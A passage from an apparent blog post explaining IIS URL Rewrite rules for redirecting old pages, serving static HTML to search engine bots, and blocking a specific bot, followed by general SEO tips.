Another common operation is when you randomly need to relocate pages for whatever reason (such as Marketing Campaigns, Branding, etc). In this case if you have several files that have been moved or renamed you can have a single rule that catches all of those and redirects them accordingly. Similarly, another sample could include an incremental migration from one technology to another where say you are moving from Classic ASP to ASP.NET and as you rewrite some of the old ASP pages into ASPX pages you want to start serving them without breaking any links or the search engine relevance.

    <rewrite>
     
<rules>
       
<rule name="Redirect Old Files and Broken Links" stopProcessing="true">
         
<match url=".*" />
          <
conditions>
           
<add input="{OldFiles:{REQUEST_URI}}" pattern="(.+)" />
          </
conditions>
         
<action type="Redirect" url="{C:0}" />
        </
rule>
     
</rules>
     
<rewriteMaps>
       
<rewriteMap name="OldFiles">
         
<add key="/tools/WebChart/sample.asp" value="tools/WebChart/sample.aspx" />
          <
add key="/tools/default.asp" value="tools/" />
          <
add key="/images/brokenlink.jpg" value="/images/brokenlink.png" />
        </
rewriteMap>
     
</rewriteMaps>
   
</rewrite>

Now, you can just keep adding to this table any broken link and specify its new address.

Others

Other potential use of URL Rewrite is when using RIA applications in the browser, whether using things like AJAX, Silverlight or Flash, that are not easy to parse and index by search engines, you could use URL Rewrite to rewrite the URL to static HTML versions of your content, however you should make sure that the content is consistent so you don't misguide users and search engines. For example the following rule will rewrite all the files in the RIAFiles table to their static HTML counterpart but only if the User Agent is the MSNBot or the GoogleBot:

    <rewrite>
     
<rules>
       
<rule name="Rewrite RIA Files" stopProcessing="true">
         
<match url=".*" />
          <
conditions>
           
<add input="{HTTP_USER_AGENT}" pattern="MSNBot|Googlebot" />
            <
add input="{RIAFiles:{REQUEST_URI}}" pattern="(.+)" />
          </
conditions>
         
<action type="Rewrite" url="{C:0}" />
        </
rule>
     
</rules>
     
<rewriteMaps>
       
<rewriteMap name="RIAFiles">
         
<add key="/samples/Silverlight.aspx" value="/samples/Silverlight.htm" />
          <
add key="/samples/MyAjax.aspx" value="/samples/MyAjax.htm" />
        </
rewriteMap>
     
</rewriteMaps>
   
</rewrite>

Related to this is that you might want to prevent search engines from crawling certain files (or your entire site), for that, you can use the Robots.txt semantics and use a "disallow", however, you can also use URL Rewrite to prevent this with more functionality such as blocking only a specific user agent:

    <rewrite>
     
<rules>
       
<rule name="Prevent access to files" stopProcessing="true">
         
<match url=".*" />
          <
conditions>
           
<add input="{HTTP_USER_AGENT}" pattern="SomeRandomBot" />
            <
add input="{NonIndexedFiles:{REQUEST_URI}}" pattern="(.+)" />
          </
conditions>
         
<action type="AbortRequest" />
        </
rule>
     
</rules>
     
<rewriteMaps>
       
<rewriteMap name="NonIndexedFiles">
         
<add key="/profile.aspx" value="block" />
          <
add key="/personal.aspx" value="block" />
        </
rewriteMap>
     
</rewriteMaps>
   
</rewrite>

There are several other things you can do to ensure that your Web Site is friendly with Search Engines, however most of them require changes to your application, but certainly worth the effort, for example:

  • Ensure your HTML includes a <title> tag.
  • Ensure your HTML includes a <meta name="description".
  • Use the correct HTML semantics, use H1 once and only once, use the alt attribute in your <img>, use <noscript> etc.
  • Redirect using status code 301 and not 302.
  • Provide Site Map's and/or Robots.txt.
  • Beware of POST backs and links that require script to run. 

Resources

For this entry I read and used some of the resources at several Web Sites, including:

12 Comments
Filed under:
More Posts Next page »
 
Page view tracker